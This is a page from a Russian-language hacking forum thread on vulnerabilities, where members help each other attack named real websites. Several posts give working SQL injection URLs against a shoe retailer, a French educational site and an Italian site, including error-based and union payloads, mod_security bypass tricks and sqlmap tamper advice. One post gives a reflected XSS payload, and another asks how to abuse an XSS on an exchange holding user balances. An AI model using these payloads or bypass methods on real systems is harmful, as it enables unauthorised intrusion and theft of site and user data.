HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 238 из 296 « Первая < 138188228 234 235 236 237 238 239 240 241 242 248288 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2371  
Старый 26.07.2018, 18:15
panic.ker
Guest
Сообщений: n/a
Провел на форуме:
35643

Репутация: 3
По умолчанию
2 BabaDook

Вероятнее всего потому, что в мануалах по дефолту так написано.

2 grelly

modsecurityversioned и modsecurityzeroversioned -тамперы под mod_security
 
Ответить с цитированием

  #2372  
Старый 26.07.2018, 18:18
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Цитата:
Сообщение от grelly  
grelly said:

Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url
http://shoebrand.co.uk/index.php?rou...th=64&limit=32
с использованием тампера between возвращает ошибку:
[WARNING] HTTP error codes detected during run:

403 (Forbidden) - 1 times.
Найденные уязвимости:
Parameter: path (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: route=product/category&path=64 AND 9469=9469&limit=32

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: route=product/category&path=64 AND SLEEP(10)&limit=32

Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?
Код:
Code:
path=64 group by elt(rand(0)|0,version()) having avg(0)-- -
Duplicate entry '5.6.39-83.1' for key 'group_key
Почитайте больше про SQL инъекции, в особенности, про вывод в ошибке! А не про то как пользоваться sqlmap.
 
Ответить с цитированием

  #2373  
Старый 26.07.2018, 18:19
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию
Там и с Union особых проблем нет

Код:
Code:
http://shoebrand.co.uk/index.php?route=product/category&path=64+AND+FALSe+/*!50000UniON*//*!50000SeLeCT*/1,version(),3+--+-&limit=32
 
Ответить с цитированием

  #2374  
Старый 28.07.2018, 16:12
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию
Код:
Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1
Можно что нить сделать?
 
Ответить с цитированием

  #2375  
Старый 28.07.2018, 19:15
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию
Маловероятно. На сайте присутствуют и другие уязвимости,можно попробовать посмотреть что то еще:

Код:
Code:
http://www.quattrobi.it/it/no_cache/prodotti/famiglia/?family[id]=98&marcatura=">alert(document.domain)
 
Ответить с цитированием

  #2376  
Старый 29.07.2018, 20:05
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от DezMond™  
DezMond™ said:

Помогите ваф обойти
Код:
Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
#1

Код:
Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1=2+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,(35)from+dual+--+
#2

Код:
Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1=if((select(1)from+dual)=1,1,2)+--+
Цитата:
Сообщение от DezMond™  
DezMond™ said:

Код:
Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1
Можно что нить сделать?
Код:
Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168.html?no_cache=1
Прочтите текст ошибки
 
Ответить с цитированием

  #2377  
Старый 30.07.2018, 22:36
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от Jerri  
Jerri said:

Хранимая может быть пассивной, т.е. от пользователя требуется что-то сделать для выполнения внедренного кода. Отраженная может быть активной, если после перехода по ссылке, например, код выполнится без дополнительных действий пользователя.
Пускай поздно, но промолчать не могу.

Для вас и других, кто прочтёт сообщение.

XSS разделяют на:

Stored или Persistent - хранимые (в простонародье активные)

Reflected - отраженные (... пассивные)

DOM-Based

Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям

То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction
 
Ответить с цитированием

  #2378  
Старый 30.07.2018, 22:48
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:

Пускай поздно, но промолчать не могу.
Для вас и других, кто прочтёт сообщение.
XSS разделяют на:
Stored или Persistent - хранимые (в простонародье активные)
Reflected - отраженные (... пассивные)
DOM-Based
Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям
То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction
Допустим есть биржа, где есть баланс и вся ***ня, и там есть XSS (пример прикрепил)

Так вот что можно сделать ?

.SpoilerTarget" type="button">Spoiler: Скрин
 
Ответить с цитированием

  #2379  
Старый 31.07.2018, 13:21
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:

Код:
Code:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168.html?no_cache=1
Прочтите текст ошибки
я понимаю что колонка id не найдена, просто думал есть какие то варики с выводом в ошибке.
 
Ответить с цитированием

  #2380  
Старый 01.08.2018, 22:48
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию
Почему Бурп не отображает содержимое GraphQL запросов?

Чем перехватывать и тестировать?
 
Ответить с цитированием
Ответ
Страница 238 из 296 « Первая < 138188228 234 235 236 237 238 239 240 241 242 248288 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ